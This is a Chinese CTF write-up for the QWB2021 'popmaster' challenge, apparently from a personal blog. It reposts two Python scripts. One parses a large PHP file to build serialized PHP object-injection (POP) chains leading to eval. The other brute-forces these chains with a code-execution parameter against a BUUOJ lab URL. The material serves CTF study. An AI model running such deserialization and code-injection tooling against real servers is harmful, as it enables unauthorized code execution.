[QWB2021 Quals]popmaster
|
0
|
185
|
buu刷题

230 字
|
6 分钟

[QWB2021 Quals]popmaster

解题步骤

差不多10w行的代码,当时强行看了2h,但是又不会写脚本,直接寄。
现在终于找到能复现的脚本了。废话不多说,直接贴大佬脚本,来自https://www.freebuf.com/articles/web/279680.html

import re, os, time

targetFunction = 'GYGtGO'
File = open('class.php', 'r').read()
MyClass = []
AllPop = []

def main():
    ParseClass(File)
    findEval(targetFunction)
    makePoc()

def ParseClass(File):
    global MyClass
    classes = re.findall(r'(class\s(.+?)\{([\S\s]*?)\}\n\n)', File)
    # classes[n][0] 类主要结构  classes[n][1] 类名
    for i in classes:
        classItem = {}
        classItem['className'] = i[1]
        classItem['propertyName'] = re.findall(r'public\s\$(.+?);', i[0])[0]
        functionValue = re.findall(r'(public\sfunction\s(.+?)\(\$(.+?)\)\{(([\S\s]+?);\n\n[\S\s]+?)\})', i[0])

        FunctionItem = {}
        for f in functionValue:
            FunctionItem[f[1]] = []
            # classItem['function'].append()
            # f[1] 函数名 f[2] 参数名 f[3] 方法体

            this2Func = re.findall(r'([\s\t]\$this->.+?->(.+?)\(.+?\));', f[3])
            if len(this2Func) != 0:
                for t in this2Func:
                    FunctionItem[f[1]].append(t[1])
        classItem['function'] = FunctionItem
        MyClass.append(classItem)

def findEval(startFunc, string=''):
    global AllPop
    for classItem in MyClass:
        nexts = classItem['function'].get(startFunc)
        if nexts != None:
            if len(nexts) == 0:
                string += classItem['className']
                AllPop.append(string.split('->'))
            for key, nexted in enumerate(nexts):
                if key == 0:
                    string += classItem['className'] + '->'
                findEval(nexted, string)

def makePoc():
    poc = "<?php\n"
    for i in MyClass:
        poc += '''class %s{
    public function __construct($a = 0){
        $this -> %s = $a;
    }
}
''' % (i['className'], i['propertyName'])
    for item in AllPop:
        poc += 'file_put_contents("poc.txt", serialize('
        for clsName in item:
            poc += 'new %s(' % (clsName)
        for clsName in item:
            poc += ')'
        poc += ') . "\\r\\n", FILE_APPEND);\n'
    open('poc.php', 'w').write(poc)
    os.popen('php poc.php')
    print('成功生成poc.txt文件,请使用爆破脚本爆破POP链路...')
    time.sleep(2)
    # os.remove('poc.php')

if __name__ == '__main__':
    main()

先用上面那个脚本生成所有pop链,写入到pop.txt。
然后用下面这个脚本进行pop链爆破

import requests, threading, time

url = 'http://99303909-d2bb-4049-afa4-93f115abf73b.node4.buuoj.cn:81/'
fileName = 'poc.txt'
def readFile():
    return open(fileName, 'r').read().split('\n')
def attack(POP):
    Param = '?pop={}&argv=var_dump("aaaaaaaaaaaaaaaaaaaa");//'.format(POP)
    result = requests.get(url + Param)
    if result.status_code != 200:
        time.sleep(3)
        result = requests.get(url + Param)
    if 'aaaaaaaaaaaaaaaa' in result.text:
        print('----------------------------------')
        print(POP)
        print('----------------------------------')
if __name__ == '__main__':
    fileData = readFile()
    for POP in fileData:
        attack(POP)

链子很jb长,传参靶机直接死5-6s,真的nb!

反序列化链分析自动化反序列化链分析
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇